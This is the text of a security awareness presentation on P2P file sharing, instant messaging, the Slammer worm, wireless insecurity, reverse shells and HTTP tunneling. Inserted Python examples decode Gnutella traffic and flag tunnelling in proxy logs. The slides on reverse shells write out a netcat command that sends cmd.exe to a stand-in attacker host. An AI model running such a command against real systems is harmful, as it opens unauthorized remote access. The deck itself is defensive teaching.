Analysts International Stuff to Worry About in Computer Security A.K.A. “Firewall? I laugh at your puny firewall” V1.0 10-0802

Dec 26, 2015


Analysts International

Stuff to Worry About in Computer Security

A.K.A. “Firewall? I laugh at your puny firewall”

V1.0 10-0802

Page 2

Introductions

• Mark Lachniet from Analysts International, Sequoia Services Group

• Senior Security Engineer and Security Services technical lead

• Former I.S. director for Holt Public Schools

• Certified Information Systems Security Professional (CISSP)

• Microsoft MCSE, Novell Master CNE, Linux LPI Certified LPIC-1, Check Point Certified CCSE, etc.

Page 3

Agenda

• Peer to Peer file sharing

• Instant Messaging

• Slammer (just for fun)

• Wireless

• Reverse command shells

• HTTP Tunneling / GoToMyPC.com

• Round table – Q&A – Brainstorming

Page 4

Peer to Peer File Sharing

• Several different networks and clients:

– Aimster
– FastTrack
– iMesh
– Audiogalaxy
– MFTP
– NeoModus
– Gnutella
– OpenNap

Page 5

Peer to Peer File Sharing

• The most popular network by far is Gnutella

• Gnutella has many different clients including:

– BearShare*
– Gnucleus
– GTK-Gnutella
– LimeWire
– Mactella
– Morpheus*
– Phex
– Qtella
– Shareaza*
– XoLoX

• Different clients have different features, systems and risks

Page 6

P2P File Sharing History

• Napster was the first successful and important one, but Napster made one mistake

• Napster used centralized servers that were under their control

• Hence the system could be shut down by going after Napster with legal action

• Newer systems have “master” nodes, but all they do is maintain lists of other peers out on the network

• Master nodes are replaceable – you could start your own P2P network by setting up your own master servers

Page 7

Napster-Style P2P

• This wasn’t too bad, at least you knew what to block

Page 8

Gnutella Style P2P

• This is *bad* for you because there is no single choke point to cut off

Page 9

P2P File Share Features

• Keyword searching

• Rate limiting / Quality of Service (via bandwidth or simultaneous upload and download limits)

• Request queuing at the serving host

• Chat facilities

• Use SHA hashes of files to uniquely ID:

– SHA hashes are unique by file
– Identifies files that are the same but have different names
– Allows for “swarm” downloads where parts of the same file are downloaded from multiple sources simultaneously (cool)
– Allows for file resumption if a source is unavailable (turned off, hung up, etc.)
– Allows for a patient person to get almost anything they can find listed

Page 10

Gnutella Communications

• Uses 5 distinct types of protocol messages: ping, pong, query, query reply, and push

• Use Shareaza to get a good protocol analyzer / decoder to see them

• Ping and Pong discovery – ask who is out there, return IP address and amount of shared files

• Query and Query reply – gives search terms (keywords) and minimum bandwidth requirements. Reply gives IP address, port, speed, matching files and GUID of querier

• Querier then connects to the server and attempts to download the file (this will break if the server is behind a firewall)

• The Push message is sent if the querier cannot connect to the server to download the data

Page 11

Push – Firewall Circumvention

• Sends the querier’s IP and port number and asks the file host to push the file to it – this will bypass a single firewall in the mix

• If both parties are behind a firewall you are probably safe… For now…

• How can you stop it? Use a firewall to block *all* outgoing communications

• Require a proxy server to mediate all requests outwards (Squid, MS-PROXY, Border Manager)

• It’s only a matter of time before P2P clients can tunnel within HTTP requests that are “proxy friendly”

• Can already be done with special (but thankfully complicated) HTTP tunneling software

• For Gnutella, you can block the “root” servers but an alternate could always be used
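The five message types from the previous slide, and the Push that carries an inside host’s address out through the firewall, all share one fixed 23-byte descriptor header, which is what an IDS or a proxy-side decoder keys on. The decoder below is an added example, not code from this presentation or from Shareaza; the byte layout follows the Gnutella 0.4 protocol description, and the GUID, addresses and search string in the samples are constructed.

```python
import struct
from ipaddress import IPv4Address

# Gnutella 0.4 descriptor header: GUID(16) | payload type(1) | TTL(1) | hops(1) | payload length(4, little-endian)
HEADER = struct.Struct("<16sBBBI")
TYPES = {0x00: "ping", 0x01: "pong", 0x40: "push", 0x80: "query", 0x81: "query_hit"}

def decode_descriptor(data: bytes) -> dict:
    """Decode one descriptor: header fields plus the payload fields the slides mention."""
    if len(data) < HEADER.size:
        raise ValueError("truncated header")
    guid, kind, ttl, hops, plen = HEADER.unpack_from(data)
    payload = data[HEADER.size:HEADER.size + plen]
    if len(payload) != plen:
        raise ValueError("truncated payload")
    msg = {"guid": guid.hex(), "type": TYPES.get(kind, f"unknown_{kind:#x}"), "ttl": ttl, "hops": hops}
    if msg["type"] == "pong":
        # Pong: port(2 LE) | IP(4) | files shared(4 LE) | kilobytes shared(4 LE) -- the "who is out there" answer
        port, ip, files, kbytes = struct.unpack("<H4sII", payload[:14])
        msg.update(port=port, ip=str(IPv4Address(ip)), files=files, kbytes=kbytes)
    elif msg["type"] == "query":
        # Query: minimum speed(2 LE) | null-terminated search criteria
        (min_speed,) = struct.unpack_from("<H", payload)
        msg.update(min_speed=min_speed, terms=payload[2:].split(b"\x00", 1)[0].decode("latin-1"))
    elif msg["type"] == "push":
        # Push: servent GUID(16) | file index(4 LE) | IP(4) | port(2 LE) -- the firewall-circumvention request
        servent, index, ip, port = struct.unpack("<16sI4sH", payload[:26])
        msg.update(servent=servent.hex(), file_index=index, ip=str(IPv4Address(ip)), port=port)
    # ping has no payload; query_hit carries a variable-length result set and is left at the header fields here
    return msg

def decode_stream(data: bytes) -> list:
    """Split a captured byte stream of back-to-back descriptors (one TCP connection) into messages."""
    msgs, pos = [], 0
    while pos + HEADER.size <= len(data):
        plen = HEADER.unpack_from(data, pos)[4]
        msgs.append(decode_descriptor(data[pos:pos + HEADER.size + plen]))
        pos += HEADER.size + plen
    return msgs

def build(guid: bytes, kind: int, ttl: int, hops: int, payload: bytes) -> bytes:
    """Assemble a descriptor; used only to construct the sample traffic below."""
    return HEADER.pack(guid, kind, ttl, hops, len(payload)) + payload

# Constructed sample descriptors (not captured traffic); GUID and addresses are made up
SAMPLE_GUID = bytes(range(16))
INSIDE = IPv4Address("10.20.30.50").packed
SAMPLE_PONG = build(SAMPLE_GUID, 0x01, 7, 0, struct.pack("<H4sII", 6346, INSIDE, 42, 9000))
SAMPLE_QUERY = build(SAMPLE_GUID, 0x80, 7, 1, struct.pack("<H", 56) + b"quarterly report\x00")
SAMPLE_PUSH = build(SAMPLE_GUID, 0x40, 7, 2, struct.pack("<16sI4sH", SAMPLE_GUID, 17, INSIDE, 6346))

if __name__ == "__main__":
    for m in decode_stream(SAMPLE_PONG + SAMPLE_QUERY + SAMPLE_PUSH):
        print(m)
```

A Push or Pong leaving the network with an RFC 1918 address in it is exactly the “sharing more than you intended” case: it tells the outside world which inside host is serving files.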

Page 12

P2P File Share Security Risks

• Spyware Spyware Spyware!

• Usually no virus scanning is done – you need to do your own

• Spoofed servers will cough up Trojans for almost any simple query (like the Benjamin Worm)

• Sharing of more than you intended

• “Transit” sharing of naughty files has been hinted at!

• Security holes (intentional or not) in the software itself

• Program minimizes (not shuts down) when exited

• P2P specific worms (e.g. the “Gnutella Worm”)

• Content problems and liability!

• Bandwidth leeching

Page 13

Future P2P Risks

• A lot of things about P2P are “dicey” but haven’t yet been exploited

• For example, the GUID is a unique identifier that is sometimes based on MAC address! (pre win2k it is said)

• That means that queries can be tracked to a workstation

• A monitoring station could also record queries by GUID/MAC as well as IP address and attempt to ascertain information about that user (such as sexual preferences, areas of interest, etc)

• Great possibility for leveraging P2P network as Denial of Service zombies by tricking all Gnutella clients into flooding a host (e.g. whitehouse.gov)

Page 14

P2P “NG” Share Sniffer

• Operates under the creed of “who needs Napster when you have Windows”

• Scans a subnet for “open” Windows shares and creates a database of them

• These open shares are then used as the storage repositories for various types of files

• This product used to be at sharesniffer.com but is gone now. I wonder why

• This was allegedly going to be a pay service!

• Due to the lack of awareness on the part of home users, this will probably work quite well

Page 15

Instant Messaging

• IM is everywhere, including my cell phone! (although I don’t use it)

• Over 81 MILLION users

• Check out: http://www.infosecuritymag.com/2002/aug/cover.shtml

• Various types of clients: AOL, ICQ, Microsoft .NET Messenger, Yahoo Messenger, etc.

• Specifically designed to get around firewalls in order to work

• Require servers for some functions (login, user lookup) but can talk directly to nodes for some things (such as file transfers)


Page 17

Problems with IM

• Bypasses gateway AntiVirus products

• Typically unencrypted

• Security problems in the software itself – many previous hacks, probably many more to come

• May allow remote-control of machines inside the firewall

• Ability to send files, URLs, etc. to individuals

• Hard to stop at the firewall

• Hard to track, log and account for

• No robust authentication systems

• Secure IM costs $$ and may require an ongoing service contract or your own server

• May be a covered medium under CIPA????

Page 18

Instant Messaging Problems

Case in Point – msgsnarf

• Dug Song released a number of network sniffing tools at http://monkey.org/~dugsong/dsniff

• These are especially interesting because of their special features!

• One feature is that it will work on a switch by using “ARP poisoning” such that even switched networks are vulnerable to sniffing

• Another feature is the inclusion of application-specific sniffers such as mailsnarf (all SMTP messages), webspy (all URLs) and msgsnarf (Instant Message information)

• This might have a “white-hat” application, actually, if you need to monitor it

Page 19

IM Management Techniques

• Use an IDS to alert you to matching traffic (and then go slap the user)

• Block access to the login servers and ports (refer to Information Security magazine’s August issue for details)

• Tightly control the workstation using imaging and desktop security products

• Require the use of proxy servers (only works in some cases – disable CONNECT on proxy)

• Use a specialized product to manage and control the access such as Akonix – this product can log and control IM and P2P software

Page 20

Slammer

• Hit in late January, 2003

• Known as Slammer or Sapphire

• Was the fastest spreading worm ever

• Took 10 minutes to cross the globe

• Doubled the # of infected systems every 8.5 seconds in the first minute (compared to Code Red, which doubled every 37 minutes)

• Took advantage of an old security bug in Microsoft SQL server

• Especially hard hit were those with Microsoft’s MSDE – a desktop version of SQL server

Page 21

Slammer

• Many people who had patched their SQL servers with the proper patch were still hit because of MSDE

• MSDE ships with a variety of products, including versions of Visio, Microsoft Visual Studio, etc.

• Took advantage of the fact that SQL server runs with admin privileges

• Hence attacks on SQL servers are very dangerous – if they succeed, you can run code of your choice as admin

• The entire worm was fit into a single UDP packet of less than 1k!

Page 22

Wireless

• If you haven’t yet heard that wireless is insecure, you have probably been living in a cave and never get news of the outside world

• Yes, wireless is insecure…. Especially anything you purchased less than 6 months ago. Newer stuff is better

• Until recently, the only security that you could get from the wireless Access Points (APs) was Wired Equivalent Privacy (WEP)

• WEP comes in 64-bit and 128-bit security features, neither of which will do you any good at all if someone really wants to get you

Page 23

Wireless

• Wardriving – it’s fun, it’s cheap, and your students think it’s spiffy

• Wireless leaks – connections can be made from physical locations outside of your control by using special hardware and software

• Omnidirectional magnetic-mount antennas, directional antennas, and even Pringles cans do a pretty good job of picking up signals you never thought possible

• Not only can anyone find your network, but they can (probably) tell what your SSID is, if you use WEP, and what vendor your equipment is

Page 24

Wireless

• Above and beyond that, modern software integrates with a GPS over a serial port to record the longitude and latitude of your AP

• When posted on the internet, your dirty laundry is aired out for all to see (*)

• Check out http://www.netstumbler.com for lots of great information

• Try it out yourself, you may be surprised

• War driving is not, in itself, illegal! However, if you ever use an AP without permission, that is over the line.

Page 25

From Work to Home: 9 Access Points in 15 Minutes

Page 26

Wireless Security Measures

• There are a few things you can do

• Put access points on a special DMZ segment on a firewall and restrict traffic

• Require users to use a VPN client to access internal resources

• Use a modern authentication system such as 802.1X (in Windows XP) and/or LEAP

• These systems can require a successful authentication (for example to a Radius server) before allowing a user to associate with an access point

• Can also require MUTUAL authentication between the AP and client in addition to user authentication

• If this didn’t exist, you could use a MitM (Man in the Middle) attack to get auth info by setting up your own “rogue” AP

Page 27

Reverse Command Shells

• One would think that if you block all incoming access, it should be impossible to access internal systems

• This is only partially true, because it assumes that the client is honest

• With P2P, IM and everything else, this is clearly not the case any more – we cannot trust our users to be security minded

• Reverse command shells, e.g. the NetCat attack, are particularly scary

• Using a utility program such as NetCat, even a Windows server can be accessed from an outside server

Page 28

How Reverse Shells Work

• Imagine the above scenario. Lachniet.com cannot hit anything on the inside network directly because you have a firewall, a 10.X network, and no direct Network Address Translation but the client has Internet access

Diagram: Hacker Workstation (lachniet.com) – The Internet – Firewall – inside network with Client Workstation 10.20.30.40, Client Workstation 10.20.30.50, a host at 10.20.30.60 and a Laser printer at 10.20.30.70

Page 29

How Reverse Shells Work

Diagram (same network as the previous slide): Hacker Workstation (lachniet.com) – The Internet – Firewall – Client Workstation 10.20.30.40, Client Workstation 10.20.30.50, 10.20.30.60, Laser printer 10.20.30.70. Labels: “LISTEN ON 8080!” at lachniet.com; “Send cmd.exe to lachniet.com 8080” at the client

• Hacker runs NetCat in Listen mode on port 8080 on lachniet.com (netcat -l -p 8080)

• Client runs NetCat with an argument of cmd.exe and directs all output to lachniet.com port 8080 (nc -e cmd.exe lachniet.com 8080)

Page 30

How Reverse Shells Work

• The result – full access as logged in user

• To stop it – no outgoing access!

• Except by proxy server

Page 31

HTTP Tunneling

• It used to be that a firewall, when properly configured, would stop clients from doing naughty things (like reverse command shells)

• Ideally we would block all outgoing access, and allow only web access through an HTTP proxy server

• This is all well and good, but it is also possible to encapsulate non-HTTP data inside of HTTP requests and data, and then pass that data down to lower layers of the OSI model

• In this way, even the most paranoid countermeasures can be circumvented including a restrictive firewall and a proxy server

• Technically speaking, it looks something like this:

Page 32

HTTP Tunneling in Practice

• Client wants to run a P2P file sharing client

• Dotted lines are HTTP traffic, Solid line is TCP

Diagram: Hacker Workstation (lachniet.com; HTTP Tunnel listens on 443, SOCKS server listens as well) and a Gnutella Host on The Internet – Firewall – Proxy Server 10.20.30.40 – inside network with Client Workstation 10.20.30.50 (runs HTTP Tunnel client and SOCKS client), 10.20.30.60 and Laser printer 10.20.30.70

Page 33

GoToMyPC.com

• Basically the same thing, except you are using a pay service for your HTTP tunnel termination

• The service also acts as a broker for who can connect to your PC

• Hopefully this broker is working properly and the average hacker CANNOT connect to your PC (note that I have seen some discussion of WebEx conferencing having vulnerabilities along these lines)

• You also get more control and presumably security through SSL, reporting, users and groups and such

Page 34

HTTP Tunneling Counter-measures

• Block *all* outgoing traffic at a firewall, and require all traffic to go through a proxy server

• Use a firewall with strict RFC compliance (I heard of some reported success with Raptor/Symantec?)

• Make sure your proxy server doesn’t allow the CONNECT verb

• Configure an IDS to sense certain types of HTTP tunneling signatures (RealSecure can detect gotomypc.com traffic signatures)

• Block all known destination servers such as those from the gotomypc.com service

• Carefully review your firewall and proxy server logs! If you see a large amount of HTTP activity going to a single host (especially one that doesn’t seem legit) check it out – go browse it yourself

• Log review may be your only recourse!
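The “review your proxy logs” bullet and the CONNECT bullet above can be turned into a small automated check: aggregate per client and destination host, flag any pair with a large amount of activity, and flag CONNECT if the proxy is supposed to refuse it. This is an added example, not code from the presentation or from Squid; it parses Squid’s native access.log format on constructed sample lines, and the thresholds and host names are assumptions to adjust for your own proxy.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Squid native access.log: time elapsed client result/status bytes method URL ident hierarchy type
LINE = re.compile(r"^(?P<ts>\d+\.\d+)\s+(?P<ms>\d+)\s+(?P<client>\S+)\s+(?P<result>\S+)\s+"
                  r"(?P<bytes>\d+)\s+(?P<method>\S+)\s+(?P<url>\S+)")

def parse_line(line: str):
    """Return client, method, destination host and bytes for one log line, or None if it does not parse."""
    m = LINE.match(line)
    if not m:
        return None
    method, url = m["method"], m["url"]
    # CONNECT carries "host:port" rather than a URL
    host = url.partition(":")[0] if method == "CONNECT" else (urlsplit(url).hostname or "")
    return {"client": m["client"], "method": method, "host": host, "bytes": int(m["bytes"])}

def review(log_text: str, max_requests: int = 50, max_bytes: int = 5_000_000, allow_connect: bool = False) -> list:
    """Aggregate per (client, host) and return the pairs a reviewer should go and look at, busiest first."""
    stats = defaultdict(lambda: {"requests": 0, "bytes": 0, "connect": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[(rec["client"], rec["host"])]
        s["requests"] += 1
        s["bytes"] += rec["bytes"]
        if rec["method"] == "CONNECT":
            s["connect"] += 1
    findings = []
    for (client, host), s in stats.items():
        reasons = []
        if s["requests"] >= max_requests:
            reasons.append(f"{s['requests']} requests to one host (threshold {max_requests})")
        if s["bytes"] >= max_bytes:
            reasons.append(f"{s['bytes']} bytes to one host (threshold {max_bytes})")
        if s["connect"] and not allow_connect:
            reasons.append(f"{s['connect']} CONNECT request(s): proxy should refuse the CONNECT verb")
        if reasons:
            findings.append({"client": client, "host": host, "requests": s["requests"],
                             "bytes": s["bytes"], "reasons": reasons})
    return sorted(findings, key=lambda f: (-f["requests"], f["client"]))

# Constructed sample log (not real traffic): two ordinary web hits, one CONNECT, and 120 small POSTs in a row
# from one client to one host, the steady polling pattern of an HTTP tunnel carrying some other protocol
NORMAL = [
    "1043190000.101    120 10.20.30.40 TCP_MISS/200 4523 GET http://www.example.com/index.html - DIRECT/198.51.100.10 text/html",
    "1043190003.220     80 10.20.30.40 TCP_HIT/200 1200 GET http://www.example.com/logo.gif - NONE/- image/gif",
    "1043190010.500   5000 10.20.30.60 TCP_TUNNEL/200 65536 CONNECT mail.example.org:443 - DIRECT/203.0.113.5 -",
]
TUNNEL = [f"{1043190020 + i}.000    300 10.20.30.50 TCP_MISS/200 2048 POST http://tunnel.example.net/t"
          " - DIRECT/203.0.113.9 application/octet-stream" for i in range(120)]
SAMPLE_LOG = "\n".join(NORMAL + TUNNEL)

if __name__ == "__main__":
    for f in review(SAMPLE_LOG):
        print(f["client"], "->", f["host"], ";", "; ".join(f["reasons"]))
```

The flagged (client, host) pairs are the ones to go and browse yourself, as the slide says; a host that answers every request with the same tiny opaque blob is the tunnel signature worth an IDS rule.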

Page 35

Q&A and Brainstorming

Mark Lachniet
Sr. Security Engineer
Analysts International
[email protected]